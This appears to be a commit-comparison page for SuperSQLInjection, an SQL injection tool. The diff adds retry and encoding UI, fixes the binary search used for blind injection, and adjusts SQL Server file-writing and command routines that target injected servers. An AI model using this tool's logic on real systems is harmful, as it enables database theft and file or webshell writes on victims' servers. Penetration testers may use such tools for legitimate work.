shack2/SuperSQLInjectionV1
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: shack2:07138cf621b7d35ceb34193e7781a08e18b2373b
Branches Tags
shack2:master
...
compare: shack2:2c19a7461fe4f5c9f1bf8a97574183e0b9428ff1
Branches Tags
shack2:master

10 Commits
07138cf621 ... 2c19a7461f

Author SHA1 Message Date
shack2
2c19a7461f 更新bug 2021-03-10 16:13:12 +08:00
shack2
ffdea17b56 更新mysql显错无法获取数据问题。 2020-11-12 15:31:09 +08:00
shack2
e93dea789b 更新 2020-05-27 11:58:53 +08:00
shack2
c89bc8f235 更新分隔符问题 2020-05-27 11:37:39 +08:00
shack2
bbe5a271d2 20200209 
bug修复
 2020-02-09 18:12:44 +08:00
shack2
46e5831a49 Update AssemblyInfo.cs 2019-12-19 17:00:14 +08:00
shack2
52aaddcbde update20191212 
update20191212
 2019-12-17 12:36:33 +08:00
shack2
ffd31a9be4 update20190905 
20190905 V1.0 正式版--
修复部分情况下自动识别列数错误问题,导致无法识别Union注入,(二分法算法缺陷导致)。
修复SQLServer延时注入,执行命令和读取文件时,无法获取结果的问题。
修复SQLServer错误注入,无法显示数据问题。
 2019-09-05 00:25:12 +08:00
shack2
12aa92187d update20190903 
update20190903
 2019-09-02 00:14:21 +08:00
shack2
3a19d6c8ca update20190902 
update20190902
 2019-09-01 23:14:43 +08:00
22 changed files with 949 additions and 629 deletions
Expand all files Collapse all files

171
SuperSQLInjection/Main.Designer.cs generated
View File

@@ -163,6 +163,14 @@
this.txt_sencond_request = new System.Windows.Forms.RichTextBox();
this.groupBox21 = new System.Windows.Forms.GroupBox();
this.label28 = new System.Windows.Forms.Label();
this.tab_retrySendHTTP = new System.Windows.Forms.TabPage();
this.lbx_retry_sendKey = new System.Windows.Forms.ListBox();
this.retrySend_cm = new System.Windows.Forms.ContextMenuStrip(this.components);
this.cms_delRetryKey = new System.Windows.Forms.ToolStripMenuItem();
this.btn_retry_addKey = new System.Windows.Forms.Button();
this.txt_retry_key = new System.Windows.Forms.TextBox();
this.label48 = new System.Windows.Forms.Label();
this.label47 = new System.Windows.Forms.Label();
this.groupBox3 = new System.Windows.Forms.GroupBox();
this.groupBox16 = new System.Windows.Forms.GroupBox();
this.label34 = new System.Windows.Forms.Label();
@@ -385,6 +393,8 @@
this.tsmi_mustRead = new System.Windows.Forms.ToolStripMenuItem();
this.ToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.tsmi_bugReport = new System.Windows.Forms.ToolStripMenuItem();
this.cbox_cmd_encoding = new System.Windows.Forms.ComboBox();
this.label49 = new System.Windows.Forms.Label();
this.gb_basic.SuspendLayout();
this.gb_logo.SuspendLayout();
this.tab_logCenter.SuspendLayout();
@@ -428,6 +438,8 @@
this.tab_sencond_inject.SuspendLayout();
this.groupBox20.SuspendLayout();
this.groupBox21.SuspendLayout();
this.tab_retrySendHTTP.SuspendLayout();
this.retrySend_cm.SuspendLayout();
this.groupBox3.SuspendLayout();
this.groupBox16.SuspendLayout();
this.groupBox15.SuspendLayout();
@@ -931,7 +943,7 @@
this.tabPage4.Location = new System.Drawing.Point(4, 22);
this.tabPage4.Name = "tabPage4";
this.tabPage4.Padding = new System.Windows.Forms.Padding(3);
this.tabPage4.Size = new System.Drawing.Size(818, 171);
this.tabPage4.Size = new System.Drawing.Size(818, 164);
this.tabPage4.TabIndex = 1;
this.tabPage4.Text = "响 应";
this.tabPage4.UseVisualStyleBackColor = true;
@@ -942,7 +954,7 @@
this.log_txt_response.Dock = System.Windows.Forms.DockStyle.Fill;
this.log_txt_response.Location = new System.Drawing.Point(3, 3);
this.log_txt_response.Name = "log_txt_response";
this.log_txt_response.Size = new System.Drawing.Size(812, 165);
this.log_txt_response.Size = new System.Drawing.Size(812, 158);
this.log_txt_response.TabIndex = 0;
this.log_txt_response.Text = "";
this.log_txt_response.KeyDown += new System.Windows.Forms.KeyEventHandler(this.log_txt_response_KeyDown);
@@ -952,7 +964,7 @@
this.tabPage1.Controls.Add(this.webBro_log);
this.tabPage1.Location = new System.Drawing.Point(4, 22);
this.tabPage1.Name = "tabPage1";
this.tabPage1.Size = new System.Drawing.Size(818, 171);
this.tabPage1.Size = new System.Drawing.Size(818, 164);
this.tabPage1.TabIndex = 2;
this.tabPage1.Text = "在浏览器中显示";
this.tabPage1.UseVisualStyleBackColor = true;
@@ -963,7 +975,7 @@
this.webBro_log.Location = new System.Drawing.Point(0, 0);
this.webBro_log.MinimumSize = new System.Drawing.Size(21, 20);
this.webBro_log.Name = "webBro_log";
this.webBro_log.Size = new System.Drawing.Size(818, 171);
this.webBro_log.Size = new System.Drawing.Size(818, 164);
this.webBro_log.TabIndex = 1;
//
// tab_file
@@ -988,7 +1000,7 @@
this.file_txt_result.Multiline = true;
this.file_txt_result.Name = "file_txt_result";
this.file_txt_result.ScrollBars = System.Windows.Forms.ScrollBars.Vertical;
this.file_txt_result.Size = new System.Drawing.Size(826, 340);
this.file_txt_result.Size = new System.Drawing.Size(826, 331);
this.file_txt_result.TabIndex = 0;
this.file_txt_result.TextChanged += new System.EventHandler(this.file_txt_result_TextChanged);
this.file_txt_result.KeyDown += new System.Windows.Forms.KeyEventHandler(this.file_txt_result_KeyDown);
@@ -1255,7 +1267,7 @@
this.tab_dbs.Location = new System.Drawing.Point(4, 29);
this.tab_dbs.Name = "tab_dbs";
this.tab_dbs.Padding = new System.Windows.Forms.Padding(3);
this.tab_dbs.Size = new System.Drawing.Size(818, 391);
this.tab_dbs.Size = new System.Drawing.Size(818, 377);
this.tab_dbs.TabIndex = 1;
this.tab_dbs.Text = "数据库信息";
this.tab_dbs.UseVisualStyleBackColor = true;
@@ -1275,7 +1287,7 @@
//
this.spc_dbs.Panel2.Controls.Add(this.toolStrip1);
this.spc_dbs.Panel2.Controls.Add(this.groupBox4);
this.spc_dbs.Size = new System.Drawing.Size(812, 385);
this.spc_dbs.Size = new System.Drawing.Size(812, 371);
this.spc_dbs.SplitterDistance = 240;
this.spc_dbs.SplitterWidth = 3;
this.spc_dbs.TabIndex = 5;
@@ -1289,7 +1301,7 @@
this.data_dbs_tsl_getTables,
this.data_dbs_tsl_getColumns});
this.data_dbs_ts.LayoutStyle = System.Windows.Forms.ToolStripLayoutStyle.HorizontalStackWithOverflow;
this.data_dbs_ts.Location = new System.Drawing.Point(0, 360);
this.data_dbs_ts.Location = new System.Drawing.Point(0, 346);
this.data_dbs_ts.Name = "data_dbs_ts";
this.data_dbs_ts.Padding = new System.Windows.Forms.Padding(5, 0, 0, 0);
this.data_dbs_ts.RenderMode = System.Windows.Forms.ToolStripRenderMode.System;
@@ -1332,7 +1344,7 @@
this.groupBox2.Controls.Add(this.data_tvw_dbs);
this.groupBox2.Location = new System.Drawing.Point(5, 6);
this.groupBox2.Name = "groupBox2";
this.groupBox2.Size = new System.Drawing.Size(235, 352);
this.groupBox2.Size = new System.Drawing.Size(235, 338);
this.groupBox2.TabIndex = 0;
this.groupBox2.TabStop = false;
this.groupBox2.Text = "数据库信息";
@@ -1349,7 +1361,7 @@
this.data_tvw_dbs.Location = new System.Drawing.Point(3, 17);
this.data_tvw_dbs.Name = "data_tvw_dbs";
this.data_tvw_dbs.SelectedImageIndex = 6;
this.data_tvw_dbs.Size = new System.Drawing.Size(229, 332);
this.data_tvw_dbs.Size = new System.Drawing.Size(229, 318);
this.data_tvw_dbs.TabIndex = 0;
this.data_tvw_dbs.AfterCheck += new System.Windows.Forms.TreeViewEventHandler(this.data_tvw_dbs_AfterCheck);
this.data_tvw_dbs.AfterSelect += new System.Windows.Forms.TreeViewEventHandler(this.data_tvw_dbs_AfterSelect);
@@ -1466,7 +1478,7 @@
this.data_dbs_tsl_getDatas,
this.data_dbs_tsl_exportDatas,
this.data_dbs_tsl_stopGetDatas});
this.toolStrip1.Location = new System.Drawing.Point(0, 360);
this.toolStrip1.Location = new System.Drawing.Point(0, 346);
this.toolStrip1.Name = "toolStrip1";
this.toolStrip1.RenderMode = System.Windows.Forms.ToolStripRenderMode.System;
this.toolStrip1.Size = new System.Drawing.Size(569, 25);
@@ -1552,23 +1564,25 @@
this.groupBox4.Dock = System.Windows.Forms.DockStyle.Fill;
this.groupBox4.Location = new System.Drawing.Point(0, 0);
this.groupBox4.Name = "groupBox4";
this.groupBox4.Size = new System.Drawing.Size(569, 385);
this.groupBox4.Size = new System.Drawing.Size(569, 371);
this.groupBox4.TabIndex = 1;
this.groupBox4.TabStop = false;
this.groupBox4.Text = "获取数据";
//
// data_dbs_lvw_data
//
this.data_dbs_lvw_data.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
| System.Windows.Forms.AnchorStyles.Left)
| System.Windows.Forms.AnchorStyles.Right)));
this.data_dbs_lvw_data.BackColor = System.Drawing.SystemColors.Window;
this.data_dbs_lvw_data.BorderStyle = System.Windows.Forms.BorderStyle.None;
this.data_dbs_lvw_data.ContextMenuStrip = this.cms_data_dbs_lvw_data;
this.data_dbs_lvw_data.Dock = System.Windows.Forms.DockStyle.Fill;
this.data_dbs_lvw_data.FullRowSelect = true;
this.data_dbs_lvw_data.GridLines = true;
this.data_dbs_lvw_data.HideSelection = false;
this.data_dbs_lvw_data.Location = new System.Drawing.Point(3, 17);
this.data_dbs_lvw_data.Name = "data_dbs_lvw_data";
this.data_dbs_lvw_data.Size = new System.Drawing.Size(563, 365);
this.data_dbs_lvw_data.Size = new System.Drawing.Size(563, 324);
this.data_dbs_lvw_data.SmallImageList = this.img_line;
this.data_dbs_lvw_data.TabIndex = 1;
this.data_dbs_lvw_data.UseCompatibleStateImageBehavior = false;
@@ -1657,6 +1671,7 @@
this.tabControl1.Controls.Add(this.tab_datapack);
this.tabControl1.Controls.Add(this.tab_tokenset);
this.tabControl1.Controls.Add(this.tab_sencond_inject);
this.tabControl1.Controls.Add(this.tab_retrySendHTTP);
this.tabControl1.ImageList = this.myicon_list;
this.tabControl1.ItemSize = new System.Drawing.Size(118, 25);
this.tabControl1.Location = new System.Drawing.Point(6, 13);
@@ -1890,6 +1905,82 @@
this.label28.TabIndex = 9;
this.label28.Text = "此处可以放二次注入时第二次请求获取注入结果的页面,用于对付一些二次注入";
//
// tab_retrySendHTTP
//
this.tab_retrySendHTTP.Controls.Add(this.lbx_retry_sendKey);
this.tab_retrySendHTTP.Controls.Add(this.btn_retry_addKey);
this.tab_retrySendHTTP.Controls.Add(this.txt_retry_key);
this.tab_retrySendHTTP.Controls.Add(this.label48);
this.tab_retrySendHTTP.Controls.Add(this.label47);
this.tab_retrySendHTTP.Location = new System.Drawing.Point(4, 29);
this.tab_retrySendHTTP.Name = "tab_retrySendHTTP";
this.tab_retrySendHTTP.Size = new System.Drawing.Size(557, 358);
this.tab_retrySendHTTP.TabIndex = 3;
this.tab_retrySendHTTP.Text = "重发数据包设置";
this.tab_retrySendHTTP.UseVisualStyleBackColor = true;
//
// lbx_retry_sendKey
//
this.lbx_retry_sendKey.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
| System.Windows.Forms.AnchorStyles.Left)
| System.Windows.Forms.AnchorStyles.Right)));
this.lbx_retry_sendKey.ContextMenuStrip = this.retrySend_cm;
this.lbx_retry_sendKey.FormattingEnabled = true;
this.lbx_retry_sendKey.ItemHeight = 12;
this.lbx_retry_sendKey.Location = new System.Drawing.Point(18, 97);
this.lbx_retry_sendKey.Name = "lbx_retry_sendKey";
this.lbx_retry_sendKey.Size = new System.Drawing.Size(518, 244);
this.lbx_retry_sendKey.TabIndex = 3;
//
// retrySend_cm
//
this.retrySend_cm.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.cms_delRetryKey});
this.retrySend_cm.Name = "retrySend_cm";
this.retrySend_cm.Size = new System.Drawing.Size(105, 26);
//
// cms_delRetryKey
//
this.cms_delRetryKey.Name = "cms_delRetryKey";
this.cms_delRetryKey.Size = new System.Drawing.Size(104, 22);
this.cms_delRetryKey.Text = "删 除";
this.cms_delRetryKey.Click += new System.EventHandler(this.cms_delRetryKey_Click);
//
// btn_retry_addKey
//
this.btn_retry_addKey.Location = new System.Drawing.Point(433, 52);
this.btn_retry_addKey.Name = "btn_retry_addKey";
this.btn_retry_addKey.Size = new System.Drawing.Size(103, 23);
this.btn_retry_addKey.TabIndex = 2;
this.btn_retry_addKey.Text = "添加重试关键词";
this.btn_retry_addKey.UseVisualStyleBackColor = true;
this.btn_retry_addKey.Click += new System.EventHandler(this.btn_retry_addKey_Click);
//
// txt_retry_key
//
this.txt_retry_key.Location = new System.Drawing.Point(72, 53);
this.txt_retry_key.Name = "txt_retry_key";
this.txt_retry_key.Size = new System.Drawing.Size(337, 21);
this.txt_retry_key.TabIndex = 1;
//
// label48
//
this.label48.AutoSize = true;
this.label48.Location = new System.Drawing.Point(16, 19);
this.label48.Name = "label48";
this.label48.Size = new System.Drawing.Size(509, 12);
this.label48.TabIndex = 0;
this.label48.Text = "当发现HTTP请求包中存在指定的关键词时重发数据包解决部分情况数据查询不成功的问题。";
//
// label47
//
this.label47.AutoSize = true;
this.label47.Location = new System.Drawing.Point(16, 56);
this.label47.Name = "label47";
this.label47.Size = new System.Drawing.Size(53, 12);
this.label47.TabIndex = 0;
this.label47.Text = "关键词:";
//
// groupBox3
//
this.groupBox3.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
@@ -2726,7 +2817,7 @@
this.cmd_txt_result.Multiline = true;
this.cmd_txt_result.Name = "cmd_txt_result";
this.cmd_txt_result.ScrollBars = System.Windows.Forms.ScrollBars.Vertical;
this.cmd_txt_result.Size = new System.Drawing.Size(826, 330);
this.cmd_txt_result.Size = new System.Drawing.Size(826, 321);
this.cmd_txt_result.TabIndex = 2;
this.cmd_txt_result.TextChanged += new System.EventHandler(this.cmd_txt_result_TextChanged);
this.cmd_txt_result.KeyDown += new System.Windows.Forms.KeyEventHandler(this.cmd_txt_result_KeyDown);
@@ -2735,6 +2826,8 @@
//
this.groupBox8.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
| System.Windows.Forms.AnchorStyles.Right)));
this.groupBox8.Controls.Add(this.cbox_cmd_encoding);
this.groupBox8.Controls.Add(this.label49);
this.groupBox8.Controls.Add(this.cmd_chk_showCmdResult);
this.groupBox8.Controls.Add(this.cmd_btn_stop);
this.groupBox8.Controls.Add(this.cmd_btn_start);
@@ -2752,7 +2845,7 @@
this.cmd_chk_showCmdResult.AutoSize = true;
this.cmd_chk_showCmdResult.Checked = true;
this.cmd_chk_showCmdResult.CheckState = System.Windows.Forms.CheckState.Checked;
this.cmd_chk_showCmdResult.Location = new System.Drawing.Point(502, 32);
this.cmd_chk_showCmdResult.Location = new System.Drawing.Point(404, 32);
this.cmd_chk_showCmdResult.Name = "cmd_chk_showCmdResult";
this.cmd_chk_showCmdResult.Size = new System.Drawing.Size(72, 16);
this.cmd_chk_showCmdResult.TabIndex = 13;
@@ -2763,9 +2856,9 @@
// cmd_btn_stop
//
this.cmd_btn_stop.FlatStyle = System.Windows.Forms.FlatStyle.Flat;
this.cmd_btn_stop.Location = new System.Drawing.Point(711, 28);
this.cmd_btn_stop.Location = new System.Drawing.Point(747, 28);
this.cmd_btn_stop.Name = "cmd_btn_stop";
this.cmd_btn_stop.Size = new System.Drawing.Size(100, 23);
this.cmd_btn_stop.Size = new System.Drawing.Size(66, 23);
this.cmd_btn_stop.TabIndex = 12;
this.cmd_btn_stop.Text = "停止";
this.cmd_btn_stop.UseVisualStyleBackColor = true;
@@ -2774,9 +2867,9 @@
// cmd_btn_start
//
this.cmd_btn_start.FlatStyle = System.Windows.Forms.FlatStyle.Flat;
this.cmd_btn_start.Location = new System.Drawing.Point(580, 28);
this.cmd_btn_start.Location = new System.Drawing.Point(653, 27);
this.cmd_btn_start.Name = "cmd_btn_start";
this.cmd_btn_start.Size = new System.Drawing.Size(100, 23);
this.cmd_btn_start.Size = new System.Drawing.Size(71, 23);
this.cmd_btn_start.TabIndex = 12;
this.cmd_btn_start.Text = "执行";
this.cmd_btn_start.UseVisualStyleBackColor = true;
@@ -2787,7 +2880,7 @@
this.cmd_txt_cmd.Location = new System.Drawing.Point(81, 30);
this.cmd_txt_cmd.MaxLength = 8000;
this.cmd_txt_cmd.Name = "cmd_txt_cmd";
this.cmd_txt_cmd.Size = new System.Drawing.Size(401, 21);
this.cmd_txt_cmd.Size = new System.Drawing.Size(317, 21);
this.cmd_txt_cmd.TabIndex = 1;
//
// label15
@@ -4114,6 +4207,29 @@
this.tsmi_bugReport.Text = "Bug反馈";
this.tsmi_bugReport.Click += new System.EventHandler(this.tsmi_bugReport_Click);
//
// cbox_cmd_encoding
//
this.cbox_cmd_encoding.FormattingEnabled = true;
this.cbox_cmd_encoding.Items.AddRange(new object[] {
"UTF-8",
"GB2312",
"GBK",
"ISO-8859-1"});
this.cbox_cmd_encoding.Location = new System.Drawing.Point(554, 29);
this.cbox_cmd_encoding.Name = "cbox_cmd_encoding";
this.cbox_cmd_encoding.Size = new System.Drawing.Size(79, 20);
this.cbox_cmd_encoding.TabIndex = 15;
this.cbox_cmd_encoding.TextChanged += new System.EventHandler(this.cbox_cmd_encoding_TextChanged);
//
// label49
//
this.label49.AutoSize = true;
this.label49.Location = new System.Drawing.Point(482, 33);
this.label49.Name = "label49";
this.label49.Size = new System.Drawing.Size(65, 12);
this.label49.TabIndex = 14;
this.label49.Text = "内容编码:";
//
// Main
//
this.AllowDrop = true;
@@ -4191,6 +4307,9 @@
this.groupBox20.ResumeLayout(false);
this.groupBox21.ResumeLayout(false);
this.groupBox21.PerformLayout();
this.tab_retrySendHTTP.ResumeLayout(false);
this.tab_retrySendHTTP.PerformLayout();
this.retrySend_cm.ResumeLayout(false);
this.groupBox3.ResumeLayout(false);
this.groupBox3.PerformLayout();
this.groupBox16.ResumeLayout(false);
@@ -4606,6 +4725,16 @@
private System.Windows.Forms.ToolStripButton toolStrip_vers_btn_selectAll;
private System.Windows.Forms.ToolStripButton toolStrip_vers_btn_selectReverse;
private System.Windows.Forms.ImageList img_line;
private System.Windows.Forms.TabPage tab_retrySendHTTP;
private System.Windows.Forms.Button btn_retry_addKey;
private System.Windows.Forms.TextBox txt_retry_key;
private System.Windows.Forms.Label label48;
private System.Windows.Forms.Label label47;
private System.Windows.Forms.ListBox lbx_retry_sendKey;
private System.Windows.Forms.ContextMenuStrip retrySend_cm;
private System.Windows.Forms.ToolStripMenuItem cms_delRetryKey;
private System.Windows.Forms.ComboBox cbox_cmd_encoding;
private System.Windows.Forms.Label label49;
}
}

301
SuperSQLInjection/Main.cs
View File

@@ -150,7 +150,7 @@ namespace SuperSQLInjection
private void Main_Shown(object sender, EventArgs e)
{
HTTP.initMain(this);
//添加支持注入的数据库列表
addDBSToItems();
//清空日志
@@ -209,7 +209,7 @@ namespace SuperSQLInjection
{
Tools.SysLog("加载配置发生错误!" + ex.Message);
}
HTTP.initMain(this);
InjectionTools.addErrorCode();
//读取模板
List<String> templates = FileTool.readAllDic("/config/template/");
@@ -286,7 +286,7 @@ namespace SuperSQLInjection
responseStream.Close();
}
public static int version = 20190901;
public static int version = 20201214;
public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(Tools.getSystemSid()) + "&VERSION=" + version;
//检查更新
public void checkUpdate()
@@ -792,10 +792,8 @@ namespace SuperSQLInjection
this.txt_log.Invoke(new showLogDelegate(log), "发出停止线程信号!", LogLevel.info);
stp.Cancel();
this.currentThread.Abort();
}
status = 0;
}
public void getVariablesByUnion(DBType dbType)
@@ -1465,7 +1463,7 @@ namespace SuperSQLInjection
public void addItemToListViewByColumns(String colvs)
{
addItemToListViewByColumns(colvs, "\\$\\$\\$");
addItemToListViewByColumns(colvs, Comm.COLUMNS_REG_SPLIT_STR);
}
public void addItemToListViewByColumnsInformix(String colvs)
@@ -2704,71 +2702,47 @@ namespace SuperSQLInjection
/// <returns></returns>
public int getValue(String payLoadStr, int start, int end)
{
int len = 0;
int mid = 0;
String payload = "";
int min = start;
int olen = 0;
Boolean lastexists = false;
while (status == 1)
while (start <= end)
{
//2分法获取中间数字
len = Tools.getLargeNum(start, end);
payload = ByPassForBetween(payLoadStr, len);
mid = Tools.getLargeNum(start, end);
payload = ByPassForBetween(payLoadStr, mid);
ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
Boolean exists = Tools.isTrue(server, config.key, config.reverseKey, config.keyType, config.injectHTTPCode);
if (end - start == 1)
{
if (!lastexists && exists)
{
return end;
}
else if (lastexists && !exists)
{
return start;
}
}
if (len == start)
if (end == start)
{
if (exists)
{
return end;
return end+1;
}
else
{
return start;
return end;
}
}
olen = len;
lastexists = exists;
if (exists)
{
start = len;
start = mid + 1; // 左侧的不要了
}
else
{
end = len;
end = mid - 1; // 右侧的不要了
}
}
return len;
return end+1;
}
public int getOrderByColumns(String payLoadStr, int start, int end)
{
int len = 0;
int mid = 0;
String payload = "";
int min = start;
int olen = 0;
//最小1是否报错最大1000是否报错
payload = ByPassForBetween(payLoadStr, 1);
ServerInfo server_1 = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
Boolean use_error = false;
Boolean lastexists = false;
payload = ByPassForBetween(payLoadStr, 1000);
ServerInfo server_1000 = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
@@ -2776,20 +2750,12 @@ namespace SuperSQLInjection
{
use_error = true;
}
while (status == 1)
while (start<=end)
{
//2分法获取中间数字
len = Tools.getLargeNum(start, end);
if (end - start == 1)
{
if (lastexists)
{
return end;
}
return start;
}
payload = ByPassForBetween(payLoadStr, len);
mid = Tools.getLargeNum(start, end);
payload = ByPassForBetween(payLoadStr, mid);
ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
Boolean exists = false;
if (use_error)
@@ -2803,20 +2769,28 @@ namespace SuperSQLInjection
{
exists = Tools.isTrue(server, config.key, config.reverseKey, config.keyType, config.injectHTTPCode);
}
if (end==start)
{
if (exists)
{
return end;
}
else {
olen = len;
lastexists = exists;
return end-1;
}
}
if (exists)
{
start = len;
start = mid+1; // 左侧的不要了
}
else
{
end = len;
end = mid-1; // 右侧的不要了
}
}
return len;
return end;
}
/// <summary>
@@ -5800,7 +5774,7 @@ namespace SuperSQLInjection
String result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", datas_value_payload));
this.txt_log.Invoke(new showLogDelegate(log), "报告大侠,获取到第" + (gp.limit + 1) + "行数据", LogLevel.info);
String[] datas = Regex.Split(result, "\\$\\$\\$");
String[] datas = Regex.Split(result, Comm.COLUMNS_REG_SPLIT_STR);
addItemToListView(datas);
}
@@ -6026,7 +6000,7 @@ namespace SuperSQLInjection
result = Tools.unHex(result, "UTF-8");
String[] items = Regex.Split(result, "\\$\\$\\$");
String[] items = Regex.Split(result, Comm.COLUMNS_REG_SPLIT_STR);
ListViewItem lvi = null;
foreach (String item in items)
{
@@ -6063,8 +6037,10 @@ namespace SuperSQLInjection
GetDataPam gp = (GetDataPam)opam;
ListViewItem lvi = new ListViewItem();
String result = getOneDataByUnionOrError(SQLServer.getErrorDataValue(gp.dbname, gp.table, gp.limit, gp.columns));
result = HttpUtility.HtmlDecode(result);
this.Invoke(new addItemToListViewByColumnsDelegate(addItemToListViewByColumns), result);
//数结果改成xml格式单独解析
addItemToListViewBySQLServerXMLData(result, gp.columns);
this.txt_log.Invoke(new showLogDelegate(log), "获取到第" + gp.limit + "行的值!", LogLevel.info);
}
catch (Exception e)
@@ -6822,6 +6798,10 @@ namespace SuperSQLInjection
public Thread injectThread = null;
private void btn_autoInject_Click(object sender, EventArgs e)
{
String a = "a$\\t$a";
String[] data = Regex.Split(a, Comm.COLUMNS_REG_SPLIT_STR);
if (autoinject == 0)
{
if (config.request.IndexOf(setInjectStr) != -1)
@@ -8211,9 +8191,16 @@ namespace SuperSQLInjection
//二次注入
this.txt_sencond_request.Text = config.sencondRequest;
//加载重试发包key
if (config.retryKey != null) {
String[] keys = config.retryKey.Split(',');
foreach(String key in keys)
{
this.lbx_retry_sendKey.Items.Add(key);
}
}
//file
this.cbox_file_readFileEncoding.Text = config.readFileEncoding;
//cmd
@@ -8416,9 +8403,9 @@ namespace SuperSQLInjection
this.file_txt_result.AppendText(text + "\r\n");
}
public void cmd_txt_resultSetText(String text)
public void cmd_txt_resultAppendText(String text)
{
this.cmd_txt_result.Text = text;
this.cmd_txt_result.AppendText(text);
}
public void readOrWriteFile()
@@ -8476,7 +8463,7 @@ namespace SuperSQLInjection
value = Tools.unHex(Tools.convertToString(ver_tmp), config.readFileEncoding);
}
this.Invoke(new StringDelegate(file_txt_resultSetText), value);
this.txt_log.Invoke(new showLogDelegate(log), this.file_cbox_readWrite.Text + "完成!", LogLevel.success);
this.txt_log.Invoke(new showLogDelegate(log), "读文件完成!", LogLevel.success);
}
catch (Exception e)
@@ -8581,6 +8568,10 @@ namespace SuperSQLInjection
if (!String.IsNullOrEmpty(this.file_txt_result.Text))
{
String payload = SQLServer.witeFileByFileSystemObject.Replace("{path}", Tools.strToHex(path, "GB2312")).Replace("{data}", Tools.strToHex(this.file_txt_result.Text, "GB2312"));
if (config.keyType.Equals(KeyType.Time) && config.injectType.Equals(InjectType.Blind))
{
payload = payload.Replace(" 1=1;", ";");
}
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
MessageBox.Show("大侠,写文件操作小的我已经完成了额,剩下的就请大侠人工检查写文件是否成功!");
}
@@ -8596,6 +8587,10 @@ namespace SuperSQLInjection
if (!String.IsNullOrEmpty(this.file_txt_result.Text))
{
String payload = SQLServer.witeFileBySP_MakeWebTask.Replace("{path}", Tools.strToHex(path, "GB2312")).Replace("{data}", Tools.strToHex(this.file_txt_result.Text, "GB2312"));
if (config.keyType.Equals(KeyType.Time) && config.injectType.Equals(InjectType.Blind))
{
payload = payload.Replace(" 1=1;", ";");
}
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
MessageBox.Show("大侠,写文件操作小的我已经完成了额,剩下的就请大侠人工检查写文件是否成功!");
}
@@ -8610,17 +8605,31 @@ namespace SuperSQLInjection
//backup database写文件
if (!String.IsNullOrEmpty(this.file_txt_result.Text))
{
String payload = SQLServer.witeFileByBackDataBase.Replace("{path}", Tools.strToHex(path, "GB2312")).Replace("{data}", Tools.strToHex(this.file_txt_result.Text, "GB2312"));
String dropWriteFileBackUpTableAndDropDB = SQLServer.dropWriteFileBackUpTableAndDropDB;
String createWriteFileBackUpDB = SQLServer.createWriteFileBackUpDB;
String createWriteFileBackUpTable = SQLServer.createWriteFileBackUpTable;
if (config.keyType.Equals(KeyType.Time) && config.injectType.Equals(InjectType.Blind))
{
payload = payload.Replace(" 1=1;", ";");
dropWriteFileBackUpTableAndDropDB = dropWriteFileBackUpTableAndDropDB.Replace(" 1=1;", ";");
createWriteFileBackUpDB = createWriteFileBackUpDB.Replace(" 1=1;", ";");
createWriteFileBackUpTable = createWriteFileBackUpTable.Replace(" 1=1;", ";");
dropWriteFileBackUpTableAndDropDB = dropWriteFileBackUpTableAndDropDB.Replace(" 1=1;", ";");
}
//删库删表
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, SQLServer.dropWriteFileBackUpTableAndDropDB, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, dropWriteFileBackUpTableAndDropDB, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
//建库建表
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, SQLServer.createWriteFileBackUpDB, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, SQLServer.createWriteFileBackUpTable, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, createWriteFileBackUpDB, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, createWriteFileBackUpTable, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
//执行备份写
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
//删库删表
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, SQLServer.dropWriteFileBackUpTableAndDropDB, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, dropWriteFileBackUpTableAndDropDB, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
MessageBox.Show("大侠,写文件操作小的我已经完成了额,剩下的就请大侠人工检查写文件是否成功!");
}
else
